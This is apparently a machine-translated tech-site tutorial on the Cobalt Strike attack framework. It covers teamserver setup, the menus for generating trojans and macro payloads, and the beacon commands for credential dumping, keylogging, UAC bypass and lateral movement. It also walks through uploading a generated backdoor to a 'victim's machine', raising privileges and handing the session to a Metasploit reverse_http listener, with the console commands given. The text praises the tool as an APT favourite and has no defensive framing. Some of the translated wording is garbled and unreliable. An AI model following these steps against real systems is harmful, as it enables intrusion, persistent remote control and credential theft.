Shulou(Shulou.com)05/31 Report--

How to carry on the intranet penetration artifact simple use, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

1. Introduce the artifact tool CobaltStrike for intranet penetration

Cobalt Strike is a Metasploit-based GUI framework penetration testing tool that integrates port forwarding, service scanning, automatic overflow, multi-mode port snooping, exe, powershell Trojan generation, etc.

Phishing attacks include: site cloning, target information acquisition, java execution, browser automatic attacks and so on.

Cobalt Strike is mainly used for team combat, it can be described as a team penetration artifact, which allows multiple attackers to connect to the group server at the same time and share attack resources and target information and sessions.

As a collaborative APT tool, Cobalt Strike becomes the first choice of many APT organizations for the penetration testing of intranet and as the control terminal function of APT.

The contents of the document are as follows:

2. Start CobaltStrike

1. Start the server CobaltStrike

Server key files teamserver and cobaktstrike.jar

Open the command interface, change to the folder directory, and type sudo. / teamserver [/ path/to/c2.profile]

1-required parameter host the public network IP/ domain name of this server

2-required parameters password to be entered when connecting to password Client GUI

3-optional parameter Malleable C2 communication profile specifies C2 communication profile this function embodies CS

Example: native IP:192.168.1.136

two。 Open the client cobaltstrike.jar and configure according to the configuration of the startup service.

Click the link to enter the main interface.

III. Introduction of parameters

1.Cobalt Strike

1-create a new link (can support multiple servers)

2-Settings (configure console interface)

3-Visualization (form of presentation control)

4-VPN interface (configure VPN)

5-listener (manage listening configuration)

6-script Manager (manage scripts for managing third-party scripts)

two。 View

1-Application information (displays the application information of the attacked machine)

2-credential information (passwords caught through hashdump or kiwifruit will be saved here)

3-File download (download file)

4-Log (event logging)

5-Keyboard recording

6-Agent Information

7-Screenshot (capture the screen of the attacker)

8-script console (interface for command execution of scripts)

9-Target (shows target host)

10-web Lo

3. attack

1-HTML Application (generate malicious HTA Trojan files)

2-MS Office Macro (generate office macro virus file)

3-Payload Generator (generate payload in various languages)

4-Windows Executable (generate executable Payload)

5-Windows Executable (S) (generate executable file containing payload,Stageless (including most functions)

1-web service management (managing open web services)

2-Clone website

3-File download (web download file is available)

4-Scripted Web Delivery (provides Web services for easy download and execution of PowerShell Payload, similar to Metasploit's web_delivery)

5-signed Applet attack (starts a Web service to provide a runtime environment for self-signed Java Applet)

6-Smart attack (automatically detects Java version and uses known exploits to bypass security)

7-Information collection (obtaining system information)

4.beacon command

Beacon > help

Beacon Commands

=

Command Description

--

Argue process parameter spoofing

Blockdlls prevents child processes from loading non-Microsoft DLL

Browserpivot injection victim browser process

Bypassuac elevates privileges by bypassing UAC

Cancel cancels the download in progress

Cd changes directories

Checkin forces the accused to connect back once.

Clear clears the task queue within beacon

Connect Connect to a Beacon peer over TCP

Covertvpn deploys Covert VPN client

Cp copy Fil

Dcsync extracts password hash from DC

Desktop remote Desktop (VNC)

Dllinject reflection DLL injection process

Dllload uses LoadLibrary to load DLL into the process

Download download file

Downloads lists file downloads in progress

Drives lists the target drive letter

Elevate uses exp

Execute executes the program on the target (no output)

Execute-assembly executes local .NET programs in memory on the target

Exit terminates a beacon session

Getprivs Enable system privileges on current token

Getsystem attempts to get SYSTEM permission

Getuid gets user ID

Hashdump dump password hash value

Help help

Inject generates a session in the injection process

Jobkill ends a background task

Jobs lists background tasks

Kerberos_ccache_use imports tickets from the ccache file to apply to this session

Kerberos_ticket_purge clears the ticket for the current session

Kerberos_ticket_use Apply imports tickets from the ticket file to apply to this session

Keylogger keyboard recording

Kill ends the process

Link Connect to a Beacon peer over a named pipe

Logonpasswords uses mimikatz to dump credentials and hash values

Ls lists files

Make_token creates tokens to pass credentials

Mimikatz runs mimikatz

Mkdir creates a directory

Mode dns uses DNS An as the communication channel (DNS beacon only)

Mode dns-txt uses DNS TXT as the communication channel (D beacon only)

Mode dns6 uses DNS AAAA as the communication channel (DNS beacon only)

Mode http uses HTTP as a communication channel

Mv moves files

Net net command

Note remarks

Portscan performs port scan

Powerpick executes commands through Unmanaged PowerShell

Powershell executes commands through powershell.exe

Powershell-import Import powershell script

Ppid Set parent PID for spawned post-ex jobs

Ps displays a list of processes

Psexec Use a service to spawn a session on a host

Psexec_psh Use PowerShell to spawn a session on a host

Psinject executes PowerShell commands in a specific process

Pth uses Mimikatz to pass hashes

Pwd current directory location

Reg Query the registry

Rev2self restores the original token

Rm deletes a file or folder

Rportfwd Port Forwardin

Run executes the program on the target (returns output)

Runas executes the program with other user privileges

Runasadmin executes programs with high privileges

Runu Execute a program under another PID

Screenshot screenshot

Setenv sets environment variables

Shell executes the cmd command

Shinject injects shellcode into the process

Shspawn starts a process and injects shellcode into it

Sleep sets sleep delay time

Socks starts the SOCKS4 agent

Socks stop stop SOCKS4

Spawn Spawn a session

Spawnas Spawn a session as another user

Spawnto Set executable to spawn processes into

Spawnu Spawn a session under another PID

Ssh uses ssh to connect to remote hosts

Ssh-key uses a key to connect to a remote host

Steal_token steals tokens from the process

Timestomp applies the timestamp of one file to another

Unlink Disconnect from parent Beacon

Upload uploads files

Wdigest Diploma Certificate using mimikatz transfer

Winrm uses WinRM horizontal infiltration

Wmi uses WMI horizontal infiltration

4. Use Cobalt strike

1. Create a listener

Note: 8 listeners are available in cs:

Beacon_xx series is Cobalt Strike itself, including dns, http, https and smb listeners.

The foreign series is an external listener, usually associated with MSF or Armitage.

After it is created, the monitoring start will be displayed.

two。 Generate backdoor

Click attack-generate backdoor-Windows Executable

The listener chooses what we just created, 64-bit or 32-bit depending on the system under attack.

Save the exe file that generates the backdoor.

3. Connect

Upload the generated backdoor program to the victim's machine, run it, and find that the host is online.

Right-click on the host, enter beacon, and you can proceed to the next command to execute the operation.

Note: the command execution function of beacon is less and inconvenient to use, you can use Ladon script.

Download Ladon script from: https://github.com/k8gege/Ladon

Specific usage of Ladon: https://github.com/k8gege/Aggressor

4. To raise the right

Right-click on the online host, click to lift the rights, and select uac to raise the rights.

After success, a new host will appear. Later operations can be done on the new host.

5. Linkage with MSF

Kali IP:172.16.20.18

Victim machine: 172.16.20.20

CS:172.16.20.19

1. Create listeners in MSF

Msf5 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

Msf5 exploit (multi/handler) > set payload windows/meterpreter/reverse_http

Payload = > windows/meterpreter/reverse_http

Msf5 exploit (multi/handler) > set lhost 172.16.20.18

Lhost = > 172.16.20.18

Msf5 exploit (multi/handler) > set lport 3333

Lport = > 3333

Msf5 exploit (multi/handler) > run

Note: monitor the address of the kali itself.

two。 Set a new listening address in CS

Note: payload should be consistent with payload in msf.

Right-click in the control-add session and select session for msf.

Get the meterpreter at this point.

Enter shell to enter the host command operation.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.